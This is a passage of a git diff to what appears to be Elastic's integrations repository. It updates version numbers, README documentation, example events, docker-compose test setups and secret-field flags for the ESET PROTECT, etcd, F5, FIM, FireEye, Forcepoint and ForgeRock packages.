@@ -282,9 +282,9 @@ An example event for `device_task` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", - "snapshot": true, - "version": "8.12.0" + "id": "e270d8a1-0a98-417c-a79f-840c446ad79a", + "snapshot": false, + "version": "8.12.2" }, "eset_protect": { "device_task": { @@ -324,7 +324,7 @@ An example event for `device_task` looks as following: "action": "Shutdown computer", "agent_id_status": "verified", "dataset": "eset_protect.device_task", - "ingested": "2024-01-04T10:09:26Z", + "ingested": "2024-03-27T16:00:39Z", "kind": "event", "original": "{\"action\":{\"name\":\"Shutdown computer\",\"params\":{\"@type\":\"type.googleapis.com/Era.Common.DataDefinition.Task.ESS.OnDemandScan\",\"cleaningEnabled\":true,\"customProfileName\":\"DefaultProfile\",\"scanProfile\":\"InDepth\",\"scanTargets\":[\"eset://AllTargets\"]}},\"description\":\"Automatically created via context menu\",\"displayName\":\"Reboot Computer - via context menu\",\"targets\":{\"devicesUuids\":[\"0205321e-XXXX-XXXX-1234-feeb35010ea7\",\"0205321e-XXXX-XXXX-5678-feeb35010ea7\",\"0205321e-XXXX-1234-5678-feeb35010ea7\"]},\"triggers\":[{\"manual\":{\"expireTime\":\"2023-12-01T01:30:00Z\"}}],\"uuid\":\"c93070e0-XXXX-1234-5678-c48f0e5e0b7e\",\"versionId\":\"1511\"}", "type": [ @@ -401,11 +401,11 @@ An example event for `event` looks as following: { "@timestamp": "2021-06-21T03:56:20.000Z", "agent": { - "ephemeral_id": "677639c3-b8cb-4791-bd2d-a6f2c144f964", - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", + "ephemeral_id": "c8765a56-3694-4bf7-aada-7f979a9581cd", + "id": "e270d8a1-0a98-417c-a79f-840c446ad79a", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.12.0" + "version": "8.12.2" }, "data_stream": { "dataset": "eset_protect.event", @@ -437,9 +437,9 @@ An example event for `event` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", - "snapshot": true, - "version": "8.12.0" + "id": "e270d8a1-0a98-417c-a79f-840c446ad79a", + "snapshot": false, + "version": "8.12.2" }, "eset_protect": { "event": { @@ -472,7 +472,7 @@ An example event for `event` looks as following: "web" ], "dataset": "eset_protect.event", - "ingested": "2024-01-04T10:10:20Z", + "ingested": "2024-03-27T16:01:32Z", "kind": "alert", "original": "{\"event_type\":\"FilteredWebsites_Event\",\"ipv4\":\"192.168.30.30\",\"hostname\":\"win-test\",\"group_name\":\"All/Lost & found\",\"os_name\":\"Microsoft Windows 11 Pro\",\"group_description\":\"Lost & found static group\",\"source_uuid\":\"d9477661-8fa4-4144-b8d4-e37b983bcd69\",\"occured\":\"21-Jun-2021 03:56:20\",\"severity\":\"Warning\",\"event\":\"An attempt to connect to URL\",\"target_address\":\"89.160.20.128\",\"target_address_type\":\"IPv4\",\"scanner_id\":\"HTTP filter\",\"action_taken\":\"blocked\",\"object_uri\":\"https://test.com\",\"hash\":\"ABCDAA625E6961037B8904E113FD0C232A7D0EDC\",\"username\":\"WIN-TEST\\\\Administrator\",\"processname\":\"C:\\\\Program Files\\\\Web browser\\\\brwser.exe\",\"rule_id\":\"Blocked by PUA blacklist\"}", "type": [ @@ -488,6 +488,7 @@ An example event for `event` looks as following: "ip": [ "192.168.30.30" ], + "name": "win-test", "os": { "name": "Microsoft Windows 11 Pro" } @@ -497,7 +498,7 @@ An example event for `event` looks as following: }, "log": { "source": { - "address": "192.168.64.8:46716" + "address": "172.19.0.11:48112" }, "syslog": { "appname": "ERAServer", @@ -521,7 +522,7 @@ An example event for `event` looks as following: }, "related": { "hash": [ - "ABCDAA625E6961037B8904E113FD0C232A7D0EDC" + "abcdaa625e6961037b8904e113fd0c232a7d0edc" ], "hosts": [ "win-test", diff --git a/packages/eset_protect/manifest.yml b/packages/eset_protect/manifest.yml index 4e27eefc225..ca754af2d8f 100644 --- a/packages/eset_protect/manifest.yml +++ b/packages/eset_protect/manifest.yml @@ -1,7 +1,7 @@ -format_version: 3.0.1 +format_version: 3.0.3 name: eset_protect title: ESET PROTECT -version: 0.1.1 +version: 0.4.0 description: Collect logs from ESET PROTECT with Elastic Agent. type: integration categories: @@ -61,6 +61,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: enable_request_tracer type: bool title: Enable request tracing diff --git a/packages/etcd/_dev/build/docs/README.md b/packages/etcd/_dev/build/docs/README.md index f24e3656cfc..eab8ce3774c 100644 --- a/packages/etcd/_dev/build/docs/README.md +++ b/packages/etcd/_dev/build/docs/README.md @@ -2,20 +2,37 @@ This integration is used to collect metrics from [etcd v2 and v3 instances](https://etcd.io/). -It periodically fetches metrics from [etcd metrics APIs](https://etcd.io/docs/v3.1/op-guide/monitoring/). +It periodically fetches metrics from [etcd metrics APIs](https://etcd.io/docs/v3.5/op-guide/monitoring/). + +## Data streams + +For etcd v2, metrics are collected through the etcd v2 APIs, whereas for v3, they are fetched from the `/metrics` endpoint. + +When using v3, datasets are bundled within `metrics` data stream, while for v2, available datasets include `leader`, `self`, and `store`. + +etcd API endpoints: +- `/v2/stats/leader`: This endpoint provides metrics related to the current leadership status. Used by `leader` data stream. +- `/v2/stats/self`: Metrics exposed by this endpoint focus on the current node's status and performance. Used by `self` data stream. +- `/v2/stats/store`: This endpoint offers metrics related to the data storage layer, including data size, read/write operations, and storage efficiency. Used by `store` data stream. +- `/metrics` (v3 API): Unlike the more specific endpoints, this one provides a comprehensive set of metrics across various aspects of the system. Used by `metrics` data stream. + +The etcd v2 APIs are not enabled by default. However, you can enable etcd v2 APIs when using etcd v3 and above by utilizing the `--enable-v2` flag, provided it is supported. ## Compatibility The etcd package was tested with etcd `3.5.x`. -## Metrics +## Requirements -For etcd v2, metrics are collected through the etcd v2 APIs, whereas for v3, they are fetched from the `/metrics` endpoint. +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. -When using v3, datasets are bundled within `metrics` data stream, while for v2, available datasets include `leader`, `self`, and `store`. +In order to ingest data from etcd, you must know the instance host. + +Host Configuration Format: `http[s]://host:port` -The etcd v2 APIs are not enabled by default. However, you can enable etcd v2 APIs when using etcd v3 and above by utilizing the --enable-v2 flag, provided it is supported. +Example Host Configuration: `http://localhost:2379` +## Metrics reference ### metrics diff --git a/packages/etcd/changelog.yml b/packages/etcd/changelog.yml index 78954360b1b..e6f874d2357 100644 --- a/packages/etcd/changelog.yml +++ b/packages/etcd/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.1" + changes: + - description: Update README to use documentation guidelines. + type: enhancement + link: https://github.com/elastic/integrations/pull/9286 - version: "1.0.0" changes: - description: Make etcd GA. diff --git a/packages/etcd/docs/README.md b/packages/etcd/docs/README.md index 163bc38ab09..bb8ca83de5a 100644 --- a/packages/etcd/docs/README.md +++ b/packages/etcd/docs/README.md @@ -2,20 +2,37 @@ This integration is used to collect metrics from [etcd v2 and v3 instances](https://etcd.io/). -It periodically fetches metrics from [etcd metrics APIs](https://etcd.io/docs/v3.1/op-guide/monitoring/). +It periodically fetches metrics from [etcd metrics APIs](https://etcd.io/docs/v3.5/op-guide/monitoring/). + +## Data streams + +For etcd v2, metrics are collected through the etcd v2 APIs, whereas for v3, they are fetched from the `/metrics` endpoint. + +When using v3, datasets are bundled within `metrics` data stream, while for v2, available datasets include `leader`, `self`, and `store`. + +etcd API endpoints: +- `/v2/stats/leader`: This endpoint provides metrics related to the current leadership status. Used by `leader` data stream. +- `/v2/stats/self`: Metrics exposed by this endpoint focus on the current node's status and performance. Used by `self` data stream. +- `/v2/stats/store`: This endpoint offers metrics related to the data storage layer, including data size, read/write operations, and storage efficiency. Used by `store` data stream. +- `/metrics` (v3 API): Unlike the more specific endpoints, this one provides a comprehensive set of metrics across various aspects of the system. Used by `metrics` data stream. + +The etcd v2 APIs are not enabled by default. However, you can enable etcd v2 APIs when using etcd v3 and above by utilizing the `--enable-v2` flag, provided it is supported. ## Compatibility The etcd package was tested with etcd `3.5.x`. -## Metrics +## Requirements -For etcd v2, metrics are collected through the etcd v2 APIs, whereas for v3, they are fetched from the `/metrics` endpoint. +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. -When using v3, datasets are bundled within `metrics` data stream, while for v2, available datasets include `leader`, `self`, and `store`. +In order to ingest data from etcd, you must know the instance host. + +Host Configuration Format: `http[s]://host:port` -The etcd v2 APIs are not enabled by default. However, you can enable etcd v2 APIs when using etcd v3 and above by utilizing the --enable-v2 flag, provided it is supported. +Example Host Configuration: `http://localhost:2379` +## Metrics reference ### metrics diff --git a/packages/etcd/manifest.yml b/packages/etcd/manifest.yml index 68de63f2b26..dba7e380087 100644 --- a/packages/etcd/manifest.yml +++ b/packages/etcd/manifest.yml @@ -1,7 +1,7 @@ format_version: "3.0.0" name: etcd title: etcd -version: "1.0.0" +version: "1.0.1" description: Collect metrics from etcd instances with Elastic Agent. type: integration categories: diff --git a/packages/f5/_dev/deploy/docker/docker-compose.yml b/packages/f5/_dev/deploy/docker/docker-compose.yml index 280225dc997..00d5613c4ae 100644 --- a/packages/f5/_dev/deploy/docker/docker-compose.yml +++ b/packages/f5/_dev/deploy/docker/docker-compose.yml @@ -7,17 +7,15 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" f5-bigipapm-udp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9526 -p=udp /sample_logs/f5-bigipapm-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9526 -p=udp /sample_logs/f5-bigipapm-*.log f5-bigipapm-tcp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9526 -p=tcp /sample_logs/f5-bigipapm-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9526 -p=tcp /sample_logs/f5-bigipapm-*.log f5-bigipafm-logfile: image: alpine volumes: @@ -25,14 +23,12 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" f5-bigipafm-udp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9544 -p=udp /sample_logs/f5-bigipafm-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9544 -p=udp /sample_logs/f5-bigipafm-*.log f5-bigipafm-tcp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9544 -p=tcp /sample_logs/f5-bigipafm-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9544 -p=tcp /sample_logs/f5-bigipafm-*.log diff --git a/packages/f5_bigip/_dev/build/docs/README.md b/packages/f5_bigip/_dev/build/docs/README.md index 04e797a7ebe..59967b10182 100644 --- a/packages/f5_bigip/_dev/build/docs/README.md +++ b/packages/f5_bigip/_dev/build/docs/README.md @@ -4,7 +4,7 @@ The [F5 BIG-IP](https://www.f5.com/products/big-ip-services) integration allows users to monitor LTM, AFM, APM, ASM, and AVR activity. F5 BIG-IP covers software and hardware designed around application availability, access control, and security solutions. -Use the F5 BIG-IP integration to collect and parse data from F5 BIG-IP using **telemetry streaming** and then visualize that data in Kibana. +Use the F5 BIG-IP integration to collect and parse data from F5 BIG-IP using **telemetry streaming** and then visualize that data in Kibana. The integration currently only supports JSON-formatted telemetry data generated by following F5 features: LTM, AFM, APM, ASM, and AVR. Ingesting or parsing the **syslog events** produced at the operating system level is not supported. Use the [Custom Logs integration](https://docs.elastic.co/integrations/log) to ingest these system-level log messages instead. The F5 BIG-IP integration can be used in three different modes to collect data: - **HTTP Endpoint mode** - F5 BIG-IP pushes logs directly to an HTTP endpoint hosted by users’ Elastic Agent. diff --git a/packages/f5_bigip/changelog.yml b/packages/f5_bigip/changelog.yml index 8ba9b8cf198..74affb3b3b6 100644 --- a/packages/f5_bigip/changelog.yml +++ b/packages/f5_bigip/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.15.0" + changes: + - description: Clarify the lack of support for syslog messages in README. + type: enhancement + link: https://github.com/elastic/integrations/pull/9510 +- version: "1.14.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.13.2" changes: - description: Changed owners diff --git a/packages/f5_bigip/docs/README.md b/packages/f5_bigip/docs/README.md index e2192df215b..d346b7066a1 100644 --- a/packages/f5_bigip/docs/README.md +++ b/packages/f5_bigip/docs/README.md @@ -4,7 +4,7 @@ The [F5 BIG-IP](https://www.f5.com/products/big-ip-services) integration allows users to monitor LTM, AFM, APM, ASM, and AVR activity. F5 BIG-IP covers software and hardware designed around application availability, access control, and security solutions. -Use the F5 BIG-IP integration to collect and parse data from F5 BIG-IP using **telemetry streaming** and then visualize that data in Kibana. +Use the F5 BIG-IP integration to collect and parse data from F5 BIG-IP using **telemetry streaming** and then visualize that data in Kibana. The integration currently only supports JSON-formatted telemetry data generated by following F5 features: LTM, AFM, APM, ASM, and AVR. Ingesting or parsing the **syslog events** produced at the operating system level is not supported. Use the [Custom Logs integration](https://docs.elastic.co/integrations/log) to ingest these system-level log messages instead. The F5 BIG-IP integration can be used in three different modes to collect data: - **HTTP Endpoint mode** - F5 BIG-IP pushes logs directly to an HTTP endpoint hosted by users’ Elastic Agent. diff --git a/packages/f5_bigip/manifest.yml b/packages/f5_bigip/manifest.yml index 34201e67618..d3d8b86c868 100644 --- a/packages/f5_bigip/manifest.yml +++ b/packages/f5_bigip/manifest.yml @@ -1,14 +1,14 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: f5_bigip title: F5 BIG-IP -version: "1.13.2" +version: "1.15.0" description: Collect logs from F5 BIG-IP with Elastic Agent. type: integration categories: - security conditions: kibana: - version: ^7.17.0 || ^8.0.0 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -44,12 +44,14 @@ policy_templates: description: The header to check for a specific value specified by `secret.value`. required: false show_user: false + secret: false - name: secret_value type: password title: Secret Value description: The secret stored in the header name specified by `secret.header`. required: false show_user: false + secret: true - name: ssl type: yaml title: SSL Configuration @@ -112,6 +114,7 @@ policy_templates: required: false show_user: true description: First part of access key. + secret: true - name: secret_access_key type: password title: Secret Access Key @@ -119,13 +122,15 @@ policy_templates: required: false show_user: true description: Second part of access key. + secret: true - name: session_token - type: text + type: password title: Session Token multi: false required: false show_user: true description: Required when using temporary security credentials. + secret: true - name: shared_credential_file type: text title: Shared Credential File diff --git a/packages/fim/changelog.yml b/packages/fim/changelog.yml index 51d9dad7ae0..64a8f4f89df 100644 --- a/packages/fim/changelog.yml +++ b/packages/fim/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.15.0" + changes: + - description: New event sourcing backends added + type: enhancement + link: https://github.com/elastic/integrations/pull/8807 +- version: "1.14.2" + changes: + - description: capture root requirement + type: enhancement + link: https://github.com/elastic/integrations/issues/8647 - version: "1.14.1" changes: - description: Changed owners diff --git a/packages/fim/data_stream/event/agent/stream/file_integrity.yml.hbs b/packages/fim/data_stream/event/agent/stream/file_integrity.yml.hbs index e5a211125d2..54ae0c00429 100644 --- a/packages/fim/data_stream/event/agent/stream/file_integrity.yml.hbs +++ b/packages/fim/data_stream/event/agent/stream/file_integrity.yml.hbs @@ -5,6 +5,7 @@ paths: {{/each}} recursive: {{recursive}} scan_at_start: {{scan_at_start}} +backend: {{backend}} hash_types: {{#each hash_types as |hash i|}} - {{hash}} diff --git a/packages/fim/manifest.yml b/packages/fim/manifest.yml index a169e85352e..80265ed0784 100644 --- a/packages/fim/manifest.yml +++ b/packages/fim/manifest.yml @@ -1,7 +1,7 @@ format_version: "3.0.0" name: fim title: "File Integrity Monitoring" -version: "1.14.1" +version: "1.15.0" description: "The File Integrity Monitoring integration reports filesystem changes in real time." type: integration categories: @@ -72,6 +72,22 @@ vars: required: false default: - sha1 + - name: backend + type: select + title: File Event Source + description: | + Forces a particular event source for file events on Linux. `fsnotify` does not provide + user information. + options: + - text: ebpf + value: ebpf + - text: fsnotify + value: fsnotify + - text: kprobes + value: kprobes + show_user: true + required: false + default: fsnotify - name: max_file_size type: text title: File size limit @@ -135,6 +151,9 @@ vars: Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. +agent: + privileges: + root: true owner: github: elastic/sec-linux-platform type: elastic diff --git a/packages/fireeye/_dev/deploy/docker/docker-compose.yml b/packages/fireeye/_dev/deploy/docker/docker-compose.yml index 3d930c02a79..2bee81f7d2f 100644 --- a/packages/fireeye/_dev/deploy/docker/docker-compose.yml +++ b/packages/fireeye/_dev/deploy/docker/docker-compose.yml @@ -7,14 +7,12 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" fireeye-nx-log-udp: - image: docker.elastic.co/observability/stream:v0.6.1 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9523 -p=udp /sample_logs/fireeye-nx.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9523 -p=udp /sample_logs/fireeye-nx.log fireeye-nx-log-tcp: - image: docker.elastic.co/observability/stream:v0.6.1 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9523 -p=tcp /sample_logs/fireeye-nx.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9523 -p=tcp /sample_logs/fireeye-nx.log diff --git a/packages/fireeye/_dev/deploy/docker/sample_logs/fireeye-nx.log b/packages/fireeye/_dev/deploy/docker/sample_logs/fireeye-nx.log index a8930a3c74a..29a8c5d577d 100644 --- a/packages/fireeye/_dev/deploy/docker/sample_logs/fireeye-nx.log +++ b/packages/fireeye/_dev/deploy/docker/sample_logs/fireeye-nx.log @@ -12,4 +12,4 @@ {"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:21.282370+0000\",\"flow_id\":1444203537876422,\"iface\":\"pether3\",\"event_type\":\"http\",\"src_ip\":\"192.168.1.222\",\"src_port\":47220,\"dest_ip\":\"192.168.100.31\",\"dest_port\":5601,\"proto\":\"TCP\",\"tx_id\":2,\"http\":{\"hostname\":\"192.168.100.31\",\"url\":\"\\/internal\\/search\\/es\",\"http_user_agent\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\",\"http_content_type\":\"application\\/json\",\"http_refer\":\"http:\\/\\/192.168.100.31:5601\\/app\\/kibana\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":729}}\n","meta_sip4":"192.168.1.99","meta_oml":598,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} {"rawmsg":"{\"timestamp\":\"2020-09-23T05:03:27.260035+0000\",\"flow_id\":1312034511612776,\"iface\":\"pether3\",\"event_type\":\"http\",\"src_ip\":\"192.168.1.222\",\"src_port\":44191,\"dest_ip\":\"192.168.100.31\",\"dest_port\":5601,\"proto\":\"TCP\",\"tx_id\":15,\"http\":{\"hostname\":\"192.168.100.31\",\"url\":\"\\/internal\\/search\\/es\",\"http_user_agent\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\",\"http_content_type\":\"application\\/json\",\"http_refer\":\"http:\\/\\/192.168.100.31:5601\\/app\\/kibana\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":318}}\n","meta_sip4":"192.168.1.99","meta_oml":599,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} {"rawmsg":"{\"timestamp\":\"2020-09-23T05:03:28.132214+0000\",\"flow_id\":1312034511612776,\"iface\":\"pether3\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.100.31\",\"src_port\":5601,\"dest_ip\":\"192.168.1.222\",\"dest_port\":44191,\"proto\":\"TCP\",\"http\":{\"hostname\":\"192.168.100.31\",\"url\":\"\\/internal\\/search\\/es\",\"http_user_agent\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\",\"http_content_type\":\"application\\/json\",\"http_refer\":\"http:\\/\\/192.168.100.31:5601\\/app\\/kibana\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":318},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/internal\\/search\\/es\",\"magic\":\"ASCII text, with very long lines, with no line terminators\",\"state\":\"CLOSED\",\"md5\":\"5a767f56dc36f6051d23ef803775e8e9\",\"stored\":false,\"size\":318,\"tx_id\":15}}\n","meta_sip4":"192.168.1.99","meta_oml":824,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} -{"rawmsg":"{\"timestamp\":\"2020-09-23T05:03:28.209311+0000\",\"flow_id\":1312034511612776,\"iface\":\"pether3\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.1.222\",\"src_port\":44191,\"dest_ip\":\"192.168.100.31\",\"dest_port\":5601,\"proto\":\"TCP\",\"http\":{\"hostname\":\"192.168.100.31\",\"url\":\"\\/internal\\/search\\/es\",\"http_user_agent\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\",\"http_refer\":\"http:\\/\\/192.168.100.31:5601\\/app\\/kibana\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"length\":0},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/internal\\/search\\/es\",\"magic\":\"ASCII text, with no line terminators\",\"state\":\"CLOSED\",\"md5\":\"51b856867e8f4ec089d623b92c81f128\",\"stored\":false,\"size\":107,\"tx_id\":16}}\n","meta_sip4":"192.168.1.99","meta_oml":747,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} \ No newline at end of file +{"rawmsg":"{\"timestamp\":\"2020-09-23T05:03:28.209311+0000\",\"flow_id\":1312034511612776,\"iface\":\"pether3\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.1.222\",\"src_port\":44191,\"dest_ip\":\"192.168.100.31\",\"dest_port\":5601,\"proto\":\"TCP\",\"http\":{\"hostname\":\"192.168.100.31\",\"url\":\"\\/internal\\/search\\/es\",\"http_user_agent\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\",\"http_refer\":\"http:\\/\\/192.168.100.31:5601\\/app\\/kibana\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"length\":0},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/internal\\/search\\/es\",\"magic\":\"ASCII text, with no line terminators\",\"state\":\"CLOSED\",\"md5\":\"51b856867e8f4ec089d623b92c81f128\",\"stored\":false,\"size\":107,\"tx_id\":16}}\n","meta_sip4":"192.168.1.99","meta_oml":747,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} diff --git a/packages/fireeye/changelog.yml b/packages/fireeye/changelog.yml index d597b8ca06e..ed0e6d63b36 100644 --- a/packages/fireeye/changelog.yml +++ b/packages/fireeye/changelog.yml @@ -1,3 +1,8 @@ +- version: "1.22.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9402 - version: "1.21.2" changes: - description: Changed owners diff --git a/packages/fireeye/data_stream/nx/_dev/test/system/test-default-config.yml b/packages/fireeye/data_stream/nx/_dev/test/system/test-default-config.yml index 0953c2c225a..bbab37637d5 100644 --- a/packages/fireeye/data_stream/nx/_dev/test/system/test-default-config.yml +++ b/packages/fireeye/data_stream/nx/_dev/test/system/test-default-config.yml @@ -5,3 +5,5 @@ data_stream: vars: paths: - "{{SERVICE_LOGS_DIR}}/fireeye-nx.log" +assert: + hit_count: 15 diff --git a/packages/fireeye/data_stream/nx/_dev/test/system/test-tcp-config.yml b/packages/fireeye/data_stream/nx/_dev/test/system/test-tcp-config.yml index 866517ffa75..61612538c63 100644 --- a/packages/fireeye/data_stream/nx/_dev/test/system/test-tcp-config.yml +++ b/packages/fireeye/data_stream/nx/_dev/test/system/test-tcp-config.yml @@ -5,3 +5,5 @@ data_stream: vars: tcp_host: 0.0.0.0 tcp_port: 9523 +assert: + hit_count: 15 diff --git a/packages/fireeye/data_stream/nx/_dev/test/system/test-udp-config.yml b/packages/fireeye/data_stream/nx/_dev/test/system/test-udp-config.yml index 62c97968aeb..b1d72234da7 100644 --- a/packages/fireeye/data_stream/nx/_dev/test/system/test-udp-config.yml +++ b/packages/fireeye/data_stream/nx/_dev/test/system/test-udp-config.yml @@ -5,3 +5,5 @@ data_stream: vars: udp_host: 0.0.0.0 udp_port: 9523 +assert: + hit_count: 15 diff --git a/packages/fireeye/manifest.yml b/packages/fireeye/manifest.yml index caf481ff154..3c2e746df22 100644 --- a/packages/fireeye/manifest.yml +++ b/packages/fireeye/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: fireeye title: "FireEye Network Security" -version: "1.21.2" +version: "1.22.0" description: Collect logs from FireEye NX with Elastic Agent. type: integration categories: diff --git a/packages/forcepoint_web/changelog.yml b/packages/forcepoint_web/changelog.yml index b1b147afb79..77378378654 100644 --- a/packages/forcepoint_web/changelog.yml +++ b/packages/forcepoint_web/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.8.0" + changes: + - description: Upgrade to package spec 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9238 - version: "1.7.2" changes: - description: Changed owners diff --git a/packages/forcepoint_web/data_stream/logs/manifest.yml b/packages/forcepoint_web/data_stream/logs/manifest.yml index 8ba666e40fc..e8938e478dc 100644 --- a/packages/forcepoint_web/data_stream/logs/manifest.yml +++ b/packages/forcepoint_web/data_stream/logs/manifest.yml @@ -21,6 +21,7 @@ streams: required: true show_user: true default: '\"%{date}\",\"%{time}\",\"%{user}\",\"%{workstation}\",\"%{category}\",\"%{action}\",\"%{risk_class}\",\"%{policy_name}\",\"%{url}\",\"%{connection_ip}\",\"%{destination_ip}\",\"%{source_ip}\",\"%{threat_type}\",\"%{threat_name}\",\"%{user_agent_string}\",\"%{http_status_code}\",\"%{http_request_method}\"' + secret: false - name: tags type: text title: Tags diff --git a/packages/forcepoint_web/manifest.yml b/packages/forcepoint_web/manifest.yml index d5261e04d59..a1a653ccaf5 100644 --- a/packages/forcepoint_web/manifest.yml +++ b/packages/forcepoint_web/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: forcepoint_web title: "Forcepoint Web Security" -version: "1.7.2" +version: "1.8.0" source: license: "Elastic-2.0" description: "Forcepoint Web Security" diff --git a/packages/forgerock/changelog.yml b/packages/forgerock/changelog.yml index 220e6b257fe..fa6a880c263 100644 --- a/packages/forgerock/changelog.yml +++ b/packages/forgerock/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.15.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.14.1" changes: - description: Changed owners diff --git a/packages/forgerock/manifest.yml b/packages/forgerock/manifest.yml index 547562465d8..d2556f58e9c 100644 --- a/packages/forgerock/manifest.yml +++ b/packages/forgerock/manifest.yml @@ -1,13 +1,13 @@ name: forgerock title: "ForgeRock" -version: "1.14.1" +version: "1.15.0" description: Collect audit logs from ForgeRock with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" categories: ["security"] conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/forgerock-dashboard.png title: ForgeRock Dashboard @@ -52,17 +52,19 @@ policy_templates: required: false show_user: false - name: api_key - type: text + type: password title: API Key multi: false required: true show_user: true + secret: true - name: api_secret type: password title: API Secret multi: false required: true show_user: true + secret: true - name: initial_interval type: text title: Initial Interval diff --git a/packages/fortinet_fortiedr/changelog.yml b/packages/fortinet_fortiedr/changelog.yml index 1b6c3c5282a..4ca07de908c 100644 --- a/packages/fortinet_fortiedr/changelog.yml +++ b/packages/fortinet_fortiedr/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.15.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: 